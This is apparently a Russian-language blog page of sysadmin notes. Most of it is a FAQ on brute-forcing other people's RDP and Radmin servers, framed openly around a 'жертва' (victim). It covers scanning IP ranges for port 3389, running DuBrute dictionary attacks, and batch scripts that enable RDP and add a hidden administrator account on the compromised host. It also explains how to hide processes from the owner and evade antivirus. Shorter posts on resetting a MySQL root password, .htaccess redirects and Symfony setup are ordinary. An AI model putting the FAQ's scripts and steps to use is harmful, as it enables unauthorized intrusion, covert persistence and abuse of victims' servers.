MYSQL. Сброс пароля у root'a
0x2f8f

Бывают случаи когда рутовский пароль для мускула утерян/забыт но позарез надо что-то сделать, к тому еще и вчера, меня пару раз спасало.

Останавливаем сервер:


sudo /etc/init.d/mysql stop

Запускаем без поддержки привилегий и сети:


sudo /usr/sbin/mysqld --skip-grant-tables --skip-networking &

Логинимся от суперпользователя:


mysql -u root

Обновляем записи:


UPDATE mysql.user SET Password=PASSWORD('newpassword') WHERE User='root';
FLUSH PRIVILEGES;
exit;

Перезапускаем:


sudo /etc/init.d/mysql restart

Все, пароль изменен.


F.A.Q. по бруту дедиков!
0x2f8f
1.Что такое дедик?
Дедик - пошло от английского слова "dedicated", что с английского значит выделенный. То есть Dedicated Server - выделенный сервер. Дедики, как их принято называть, на которых имеются довольно мощные сетевые интерфейсы, каналы и довольно не слабая аппаратная конфигурация
служат для обработки данных, а также для хранения баз данных или любого другого материала находящегося на них для обслуживания персонала, фирмы или организации.
В двух словах это постоянно работающие компьютеры с постоянным доступом в глобальную сеть, к которым разрешено, и можно управлять удаленным доступом...

2.Для чего предназначены дедики?
Дедики можно использовать для абсолютно разных целей например для анонимного интернет серфинга, для брута, спама, можно ставить на нем игровые сервера, а также для "плохих" целей, сами знаете каких, не буду говорить))

3.Где достать дедик?
Дедик можно купить, сбрутить или добыть с помощью трояна.

4.Как зайти на дедик?

Для того чтобы зайти на дедик нажимаем Пуск->Выполнить... у вас откроется окно "Запуск программы" в нем пишем mstsc и нажимаем OK,
откроется окно "Подключение к удаленному рабочему столу" в поле "Компьютер:" пишем ip адрес дедика, для более удобного доступа нажимаем кнопку "Параметры"
и в поле "Пользователь" пишем имя учётки, ставим галочку на "Разрешить мне сохранять учетные данные" и нажимаем Подключить,
появится еще одно окно в нем пишем пароль и ставим галочку внизу, на нажимаем ОК и все вы на дедике.
Чтобы зайти на него еще раз вам просто будет нужно
выбрать ip дедика и нажать Подключить и ваш компьютер автоматически введет логин и пароль к пользователю.
Когда вы это все проделали в Параметры->Параметры подключение можно нажать сохранить как и сохранить файл с расширение .rdp потом надо будет только запустить файл и вы сразу окажетесь на дедике.

5.Брут дедиков
-Брут RDP
RDP - протокол удалённого рабочего стола.
Для брута RDP нам понадобится следующие программы(антивирус может ругаться) DuBrute 2.1(сам брут),VT, vnc_scanner_GUI(сканер портов),VT, и можно еще ipgeobase(база данных IP адресов),VT.
И так приступим.
1.Запустите ipgeobase выберите округ, регион или город, скопируйте все ip адреса в буфер.
2.Теперь запустите vnc_scanner_GUI и вставьте в самое большое поле все ip адреса.
Выглядит это примерно так:

Теперь нажимаем Start Scan и ждем окончания работы.
По окончании работы нажимаем Start Parser, теперь в файле IPs.txt сохранятся все ip адреса с открытым 3389 портом.
3.Заходите в Папку с Брутом!
Там должны быть Текстовые файлы:
good.txt
bad.txt
login.txt (Здесь будут логины, вы можете сами их придумать ... Login,User,Administrator,Admin и т.д.
password.txt (Здесь будут пароли , вы их можете найти в Интернете или сами придумать ... Password, P@ssword, Passw0rd и т.д.)
Вот подкину как пример немного лог/пас.
Список других словарей тык.
Успех брута во многом зависит от хорошего словаря!
Также можете скачать программы такие как DUBkill,VT, PoweR_Utilits,VT для удаления одинаковых строк в текстовых файлах, поможет в составлении списка паролей для брута дедиков или иных целей.
1)Запускаем DuBrute 2.1 и нажимаем Generation.


2) Нажимаете File IP и выбираете сканированный диапазон ( айпишники )
3) Нажимаете File Login и выбираете логины ваши , они находится в папке с брутом.
4) Нажимаете File Pass и выбираете Пароли ваши, находятся там же.
5) Нажимаете Make, потом OK. И можете закрывать Окошко это.
6) Здесь надо поставить число Потоков . ( Зависит от скорости Интернета)
7) Здесь ставим от 1 до 10 вообщем, больше не надо. ( Что это? Ответ: Это повторное соединение с дедиком. То есть, если первый раз не зайдет по каким то причинам , он будет пробовать столько раз заходить , скольку у вас стоит ... Думаю Понятно. )
8. Это время с дедиком, то есть ... Если Дедик не умрет за 20 мин. то он зачислится в список good.Нажимаете ОК. Нажимаете Start. После брут RDP закончен.



Код:

@Echo off
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


Код:

Set AdmGroupSID=S-1-5-32-544
Set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J
Set AdmGroup=%AdmGroup:~0,-1%
net user Имя_пользователя Пароль /add
net localgroup %AdmGroup% Имя_пользователя /add
Set RDPGroupSID=S-1-5-32-555
Set RDPGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J
Set RDPGroup=%RDPGroup:~0,-1%
net localgroup "%RDPGroup%" Имя_пользователя /add
net accounts /maxpwage:unlimited
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Имя_пользователя /t REG_DWORD /d "00000000" /f-Брут Radmin

1. Сам процесс брута
Radmin - программа для удалённого доступа.
Для ее брута нам понадобится lamescan3_r11,VT, ipgeobase и клиент радмина radmin viewer 3.5(если найдете крякнутый,выкладывайте)
1.Приступим, сначала запускаем lamescan3_r11 и нажимаем Настройка->основное
Настроим его так:

закрываем окно и нажимаем Настройка->Интерфейс там укажите путь к радмину, и поставьте все галочки.
Вот так:

2.Запустите ipgeobase выберите округ, регион или город, скопируйте все ip адреса, в lamescan нажмите Диапазоны->Добавить в очередь->Список диапазонов, вставляем туда ip адреса и нажимаем Готово.
Теперь включаем сканирование(зеленый треугольник) и ждем окончание работы.
После окончания работы можете спокойно подключаться к хостам к которым подобран пароль.
Вот и все на этом брут Radminа закончен.
2.Что делать дальше?
После того как вы сбрутили несколько радминов нам понадобится сделать с них дедик, т.е. включить RDP(удалённый рабочий стол), и пропатчить систему на мультиюзерность(чтобы вы и админ не мешали друг другу).
Приступим, включить RDP можно так:
-Щелкаем Правой кнопкой мышки на Мой компьютер->Свойства
-Переходим на вкладку "Удалённые сеансы"
-Ставим везде галочки
или с помощью батника:
Код:

@Echo off
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Чтобы запустить батник на компьютере у жертвы надо с помощью передачи файлов закинуть батник в недры windows и подключиться к командной строке, командой "cd Имя каталога" перейти в папку в которую положили батник и ввести в ней имя батника например batnik.bat
Чтобы включить мультиюзерность надо пропатчить систему следующим патчем TS_Free,VT, и перезагрузить компьютер, запустить его можно также с использованием командной строки.
Вот и все теперь можете подключиться к компьютеру по RDP, но пользователя у вас пока не будет, как его создать читайте далее.

6.Как создать и скрыть пользователя на дедике?
Основные способы!
1.С помощью Управление компьютером.
-Щелкаем Правой кнопкой мышки на Мой компьютер->Управление
-Локальные пользователи и группы->Пользователи->Правая кнопка мыши Новый пользователь и вводим имя, пароль и тд.(Галочку поставте только на 3 пункте)
2.С помощю cmd.
Включаем cmd и создаем пользователя командами:
net user Имя Пароль/add
net localgroup Група администраторов Имя /add
net localgroup Група пользователей RDP Имя /add
net accounts /maxpwage:unlimited
3.С помощью батника который создает и сразу скрывает пользователя с экрана приветствий
Код:

Set AdmGroupSID=S-1-5-32-544
Set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J
Set AdmGroup=%AdmGroup:~0,-1%
net user Имя_пользователя Пароль /add
net localgroup %AdmGroup% Имя_пользователя /add
Set RDPGroupSID=S-1-5-32-555
Set RDPGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J
Set RDPGroup=%RDPGroup:~0,-1%
net localgroup "%RDPGroup%" Имя_пользователя /add
net accounts /maxpwage:unlimited
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Имя_пользователя /t REG_DWORD /d "00000000" /f

4.С помощью программы DED C14,VT, она создаст и скроет пользователя.

5.Скрыть пользователя.
Вот мы создали пользователя теперь надо скрыть его с экрана приветствия при запуске windows и в папке Documents and Settings, на скрытии в папке останавливаться не буду надеюсь все это знают.
Чтобы скрыть пользователя на экране приветствия в ветке реестра
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t
нужно создать параметр типа DWORD с именем пользователя и значением 0.
Но и тут я вам предложу прогу Hide-USER,VT, как альтернативу
Вот и все, теперь на дедике у нас есть свой скрытый пользователь.

7.Как пользоваться дедиком не создавая пользователя(под админом) и не быть замеченным?
Для того чтобы использовать дедик не создавая пользователя (на пользователе админа) нам нужны следующие программы hidetoolz,VT, PS Tray Factory,VT, DelTrayIcon,VT.
Начнем запускаем свои программы (с которыми вы собираетесь работать на дедике), все там запускаете, и теперь начнем их прятать:
- Запускаем PS Tray Factory и в первых двух вкладках отмечаем приложения которые хотим скрыть и сворачиваем его(не выключаем). После этого действия пропадут окна наших программ, но останется в процессах иконка PS Tray Factory.
- Запускаем DelTrayIcon и удаляем иконку PS Tray Factory и выключаем его. Мы удалили иконку PS Tray Factory осталось скрыть процессы PS Tray Factory и программ которые мы хотели скрыть.
- Запускаем hidetoolz и на процессах которые создали наши приложения нажимаем правую кнопку мыши->HIDE и выключаем его.
Если вы все сделали правильно то теперь наши программы работают на учетке админа полностью скрытно и он об этом даже не подозревает.
Теперь чтобы увидеть окна ваших программ включите hidetoolz и сделайте все процессы видимыми, убейте в диспетчере задач процесс PS Tray Factory, система немного залагает и покажет вам окна всех программ которые вы скрыли.

8.Что делать если антивирус на дедике удаляет ваши программы?
Объяснять для каждого антивируса очень долго но расскажу в общем виде.
Нужно создать папку где-то в недрах windows, добавить в настройках антивируса нашу папку в исключения и скачать в нее все программы.
Если антивирус не разрешает изменений и просит пароль можем попытаться выключить его, или в крайнем случае поискать в текстовых документах админа пароль к ав. Удалять его не стоит так как админ сразу спалит вас и выгонит со своего компа.

9.Что делать если на дедике ScreenLocker?
Как обойти новые локеры я честно говоря не знаю, но можно попытатся вызвать диспетчера задач комбинацией клавиш [Ctrl]+[Shift]+[Esc] и убить процесс локера, или вызвать командную строку с помощью [Win]+[R] ввести cmd и в ней командами tasklist и taskkill убить процесс локера.

10.Как подключить свой локальный диск и буфер обмена к дедику?

Для того чтобы подключить к дедику свой локальный диск и буфер обмена в окне "Подключение к удаленному рабочему столу" нажимаем "Параметры" выбираем вкладку "Локальные ресурсы" внизу ставим галочку на "Буфер обмена" и нажимаем "Подробнее" в открывшемся меню выбираем какое устройство вы хотите подключить и ставим галочку возле него(если подключить диск на котором установлена ваша ОС (Обычно диск C ) то можно будет передавать файлы через буфер обмена), нажимаем ОК и все готово, теперь вы можете намного легче и быстрее передать необходимые файлы на дедик, только не увлекайтесь этим потому что ваш локальный диск будет доступен всем пользователям дедика т.е. админ увидит что подключился ваш диск, потому надо быстро передать файлы, выйти из дедика, отключить диск и пользоваться дедиком дальше.

11.Автоматически запустить свою прогу при входе на дедик.
Вы можете запустить свою программу при подключении (обычно программы для сбора информации) для этого в окне "Подключение к удаленному рабочему столу" нажимаем "Параметры" выбираем вкладку "Программы", ставим галочку и в поле путь к программе и имя файла пишем "tsclient\\буква диска\путь к файлу" и нажимаем подключить.

12.Небольшой бонус.
Для тех кто активно работает с дедами, будет полезна прога dsb_07,VT. Она создана для хранения списков учетных записей пользователей на выделенных серверах и управления ими.
Программа позволяет удобно организовать списки учетных записей, разделив их на группы, в соответствии с их целевым назначением.
Вы можете выделить серверы для личного пользования в одну группу, учетные записи с правами администратора в другую, а серверы, находящиеся в продаже или аренде, в третью.

.htaccess. Примеры
0x2f8f

Для использования 301 редиректа сначала в первых строках файла .htaccess прописываются директивы, необходимые для работы модуля mod_rewrite:

Options +FollowSymLinks
RewriteEngine On
RewriteBase /

Рассмотрим типичные правила перенаправлений.

Редирект с адреса с www-префиксом на адрес без www

Подобные перенаправления переадресуют все страницы сайта вида http://www.site.com.ua/page.html на страницы http://site.com.ua/page.html. Для такого типа редиректа можно использовать следующий шаблон:

RewriteCond %{HTTP_HOST} ^www\.site\.com\.ua$ [NC]
RewriteRule ^(.*)$ http://site.com.ua/$1 [R=301,L]

Или же упрощенный вариант:

RewriteCond %{HTTP_HOST} ^www\.(.*) [NC]
RewriteRule ^(.*)$ http://%1/$1 [R=301,L]

Редирект с адреса без www на адрес с www

Этот 301 редирект со страниц домена вида http://site.com.ua/page.html на страницы http://www.site.com.ua/page.html делается подобным описанному выше методу, только меняется положение www:

RewriteCond %{HTTP_HOST} ^site\.com\.ua$ [NC]
RewriteRule ^(.*)$ http://www.site.com.ua/$1 [R=301,L]

Или альтернативный упрощенный вариант:

RewriteCond %{HTTP_HOST} !^www\.(.*) [NC]
RewriteRule ^(.*)$ http://www.%1/$1 [R=301,L]

Стоит также отметить, что иногда правила работают даже если точки не экранированы с помощью обратного слэша, но не стоит этим злоупотреблять, на некоторых серверах это может привести к ошибке.

Склейка индексной страницы с корнем сайта

Такой тип редиректов часто доставляет проблемы в случае, если используется CMS, перенаправляющая все запросы к сайту на индексную страницу. Добавление директивы в .htaccess файл тогда приведет к циклу бесконечных перенаправлений. Самым простым выходом из ситуации будет вставка небольшого фрагмента кода в начало индексной страницы (например index.php):

if($_SERVER['REQUEST_URI'] == "/index.php") {

header("Location: /",TRUE,301);
exit();

}

Таким образом, при обращении к индексной странице сравнивается, если запрошенный адрес равен, к примеру, http://site.ua/index.php, то условие срабатывает и происходит переадресация на корень сайта http://site.ua/. Если сайт не перенаправляет все запросы на index.php можно воспользоваться следующим шаблоном для mod_rewrite:

RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /index\.php\ HTTP/
RewriteRule ^index\.php$ http://site.com.ua/ [R=301,L]

Такой же редирект может использоваться и для других расширений главной страницы, таких как index.html, или например index.phtml.

Редирект с поддомена на подпапку

Такая разновидность 301 редиректа нужна для перенаправления многочисленных однотипных страниц с поддомена на новые адреса, имеющие определенный шаблон. Такая задача часто возникает, например, когда другая языковая версия сайта доступна на поддомене и в подпапке основного домена.

Пусть, к примеру, есть страница с адресом http://eng.site.com.ua/page.html и нам нужно склеить ее с дублирующей страницей http://site.com.ua/eng/page.html. Используем для этого следующий шаблон (прописывается для .htaccess файла поддомена):

RewriteCond %{HTTP_HOST} ^www\.eng\.site\.com\.ua [OR]
RewriteCond %{HTTP_HOST} ^eng\.site\.com\.ua
RewriteRule ^(.*)$ http://www.site.com.ua/eng/$1 [L,R=301]

Редирект с подпапки домена на поддомен

Если необходимо наоборот, перенаправить пользователя с подпапки на поддомен, то используйте следующий шаблон:

RewriteCond %{HTTP_HOST} ^site\.com\.ua$ [NC]
RewriteRule ^\/eng\/(.*)$ http://eng.site.com.ua/$1 [R=301,L]

Редирект с одних расширений файлов на другие

При смене движка либо при переходе со статической версии сайта на динамическую следует оставить доступность страниц по старым адресам. Для этого старые адреса страниц необходимо направить на страницы с новым расширением.

RewriteRule ^(.*)\.html$ $1.php [R=301,L]

Редирект на другой сайт

Создавая новый сайт, бывает необходимость сделать его основным зеркалом, перенаправляя пользователей со старого домена на новый. Для этого можно использовать шаблон приведенный ниже.

RewriteCond %{HTTP_HOST} ^oldsite\.com\.ua
RewriteRule ^(.*)$ http://newsite.com.ua/$1 [R=301,L]

Все страницы старого домена будут перенаправлены на соответствующие страницы нового.

301 Редирект динамических страниц

При модернизации динамического сайта и создании ЧПУ-адресов часто возникает необходимость перенаправить старые страницы с параметрами ID на новые с ЧПУ. Например, чтобы переадресовать страницу вида http://site.com.ua/page.php?id=13 на новую страницу http://site.com.ua/newname.html, используется следующая конструкция:

RewriteCond %{QUERY_STRING} ^id=13$
RewriteRule ^/page.php$ http://site.com.ua/newname.html [L,R=301]

Редиректы кириллических и .рф доменов

Все описанные выше правила справедливы и для доменов написанных кириллицей. Однако, при создании перенаправлений кириллические домены лучше заменять так называемымPunycode. Для этого можно воспользоваться одним из онлайн-сервисов конвертацииWhiteWhois.

Полученное закодированное доменное имя можно легко использовать для любого шаблона 301 редиректа, описанного выше.

Несмотря на обилие различных шаблонов и готовых решений, лучшим решением является самостоятельное освоение принципов работы mod_rewrite и синтаксиса его директив. Понимание базовых конструкций позволит с легкостью писать свои редиректы, а также читать и исправлять существующие .htaccess файлы.

Tags:

Symfony. Переименовываем папку web
0x2f8f
Некоторые хостинги вместо папки web предоставляют другие, к примеру www.
Для того, чтобы корректно заробило на хостинге:
1. Создаём в project/apps/index/config/config.php
2. Вставляем в него код:
<?php
$sf_root_dir = sfConfig::get('sf_root_dir');
sfConfig::add(array(
  'sf_web_dir_name' => $sf_web_dir_name = 'www',
  'sf_web_dir'      => $sf_root_dir.DIRECTORY_SEPARATOR.$sf_web_dir_name,
  'sf_upload_dir'   => $sf_root_dir.DIRECTORY_SEPARATOR.$sf_web_dir_name.DIRECTORY_SEPARATOR.sfConfig::get('sf_upload_dir_name'),
))
?>

Symfony. sfCKEditorPlugin
0x2f8f
Описание плагина: http://www.symfony-project.org/plugins/sfCKEditorPlugin
Станадартная команда установки: sudo php symfony plugin:install sfCKEditorPlugin
Т.к. стандартная команда установки выдаёт сообщение:
No release available for plugin "sfCKEditorPlugin" in state "stable" 
Качаем исходники и устанавливаем командой: sudo php symfony plugin:install sfCKEditorPlugin-0.1.2.tgz 
Также качаем исходники самого CKEditor'а http://ckeditor.com/download Распаковываем архив в папку web.
В корневой папке config создаём файл autoload.yml, в котором пишем:
autoload:
  ckeditor:
    name:       ckeditor
    path:         %SF_WEB_DIR%/ckeditor
    recursive:  true

В app.yml нужных приложений пишем:
all:
  ckeditor:
    basePath:         '/ckeditor/'

В форме поле text юзаем так:
      $this->setWidgets(array(
        'id'              => new sfWidgetFormInputHidden(),
        'title'           => new sfWidgetFormInputText(),
        'alias'         => new sfWidgetFormInputText(),
        'text'           => new sfWidgetFormCKEditor(),
        'created_at' => new sfWidgetFormDateTime(),
        'author'       => new sfWidgetFormInputHidden(),
      ));

?

Log in